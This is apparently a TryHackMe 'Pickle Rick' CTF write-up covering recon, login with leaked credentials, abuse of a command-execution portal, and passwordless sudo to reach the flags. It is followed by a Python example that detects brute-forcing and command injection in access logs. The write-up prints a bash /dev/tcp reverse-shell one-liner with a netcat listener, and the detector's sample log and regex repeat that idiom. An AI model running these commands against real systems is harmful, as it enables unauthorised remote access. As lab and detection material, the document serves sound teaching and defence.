Hello everyone, this is my first write-up on hacklido. I hope you will like it.
Machine name: Pickle Rick
Disclaimer: my IP address will be different from yours.
Ignore the IPs in my post; they will differ from one step to the next since I had to reboot the machine more than once.
Link to the room: https://tryhackme.com/room/picklerick
Start the machine and connect to the THM network via OpenVPN, or use the AttackBox. Whenever you are on a CTF or trying to solve a machine, the most important phase is gathering as much information as you can about your target, i.e. reconnaissance.
So that is what we are going to do.
Scanning & Enumeration
A good rule of thumb is to start by scanning your machine for any open ports.
nmap -A -sV -sC <ip>
-sC: scan with the default NSE scripts, which are considered useful for discovery and safe
-sV: attempt to determine the version of the service running on each open port
-A: run an aggressive scan against these ports
Port 22 - SSH
Here we can see that SSH is open. This port is not much of an attack surface on its own unless we have found someone's credentials, so we will not mess with it.
Port 80 - HTTP
This is where we find a web service. Let's poke around and see if there is anything interesting.
As it is running a web app, let's use Nikto to see whether it turns up anything.
Command: nikto -h <ip>
Nothing interesting, hmm. Okay, let's move on.
Let's check the page source and see if we find anything, because in a CTF there is usually something hidden in the page source.
So we get a username here: R1ckRul3s
Finding Hidden Directories
We will first check whether robots.txt exists and, if so, what's in it.
Wow, we got something that looks a lot like a password: Wubbalubbadubdub
Now we will use DirBuster to find hidden directories, so fire it up.
We can see there is a login.php, and something called assets, which looks promising. Let's take a look.
Go to http://10.10.221.38/login.php
So there's a login panel. We already have a username from the page source of the main page, and we have something from robots.txt that looks like a password. Let's see whether they work.
Perfect!! It worked. We are logged in and are brought to the command portal.
This kind of portal looks quite familiar; let's see if we can execute system commands through it.
Great stuff, so there is a command execution vulnerability. Now I wonder whether we can access Sup3rS3cretPickl3Ingred.txt the same way we did robots.txt. So in my browser I just went to http://<ipAddress>/Sup3rS3cretPickl3Ingred.txt and, what do you know, we now have the contents of that text file.
One down, two to go!
We now have one ingredient. It is time to find the other two, but where do we start looking? We saw there is a clue.txt; let's open it in the browser too.
Look around the file system for the other ingredient.
So that is the hint from clue.txt. Now let's go back to the command portal and exploit the command execution vulnerability there.
Let's open a listening port on our machine;
We will use netcat for it.
Command: nc -lvnp 53
After a lot of trial and error with Python reverse shells, not understanding why they didn't work, I looked at another write-up and found that you could use a bash reverse shell; after running it wrapped in bash -c '', I had a reverse shell:
bash -c 'bash -i >& /dev/tcp/<your ip>/<port> 0>&1'
So we get a reverse shell back in our terminal.
Now let's look for the second flag.
So we get the second flag. Now we need one more, the last flag. Let's check the root folder.
Oops! It seems we don't have permission to access it.
Knowing from prior experience that the user can run sudo commands without a password, I got my hands on the last flag.
Yo boi! We get the third one, and we have successfully completed the room.
So I hope this write-up helps you, and if I have made any mistakes, let me know in the comments :)
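The whole chain above (robots.txt fetch, directory brute-force, login, then shell metacharacters sent to the command portal) leaves a clear trail in the web server's access log. Here is an added detection example, not from the room or from this write-up, that runs two checks over constructed Apache-style log lines: a burst of 404s from one IP (directory brute-forcing) and request paths carrying shell metacharacters or the /dev/tcp reverse-shell idiom. The /portal.php path, the command parameter and all IPs in the sample are assumed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus
# Constructed Apache-style access log; the IPs and the /portal.php path are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:10:00:02 +0000] "GET /robots.txt HTTP/1.1" 200 16
10.0.0.5 - - [10/Oct/2023:10:00:03 +0000] "GET /admin HTTP/1.1" 404 276
10.0.0.5 - - [10/Oct/2023:10:00:03 +0000] "GET /backup HTTP/1.1" 404 276
10.0.0.5 - - [10/Oct/2023:10:00:04 +0000] "GET /images HTTP/1.1" 404 276
10.0.0.5 - - [10/Oct/2023:10:00:05 +0000] "GET /uploads HTTP/1.1" 404 276
10.0.0.5 - - [10/Oct/2023:10:00:10 +0000] "POST /login.php HTTP/1.1" 302 0
10.0.0.5 - - [10/Oct/2023:10:00:12 +0000] "GET /portal.php?command=ls HTTP/1.1" 200 500
10.0.0.5 - - [10/Oct/2023:10:00:15 +0000] "GET /portal.php?command=bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.0.0.9/53+0%3E%261%27 HTTP/1.1" 200 0
10.0.0.7 - - [10/Oct/2023:10:01:00 +0000] "GET /assets/bootstrap.min.css HTTP/1.1" 200 121200
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Shell metacharacters plus the bash /dev/tcp reverse-shell idiom used in this write-up.
INJECT_RE = re.compile(r'/dev/tcp/|bash -[ic]|[;|`]|&&|\$\(')

def parse_line(line):
    # Parse one access-log line into a dict; return None for lines that do not match.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = unquote_plus(rec["path"])  # decode %xx and '+' so the patterns see real characters
    return rec

def detect(log_text, burst=4, window_s=10):
    # Return (ip, rule, detail) findings: 404 bursts per IP and injection-looking request paths.
    findings = []
    recent_404 = defaultdict(list)  # ip -> timestamps of 404s inside the sliding window
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 404:
            ts = recent_404[rec["ip"]]
            ts.append(rec["ts"])
            while (ts[-1] - ts[0]).total_seconds() > window_s:  # drop 404s older than the window
                ts.pop(0)
            if len(ts) >= burst:  # alert once per burst, then start counting again
                findings.append((rec["ip"], "dir-bruteforce", f"{len(ts)} 404s within {window_s}s"))
                ts.clear()
        if INJECT_RE.search(rec["path"]):
            findings.append((rec["ip"], "command-injection", rec["path"]))
    return findings
```

On the sample above, detect(SAMPLE_LOG) reports one brute-force burst and one command-injection hit, both from 10.0.0.5, while the benign portal command and the other client's static-asset request pass silently.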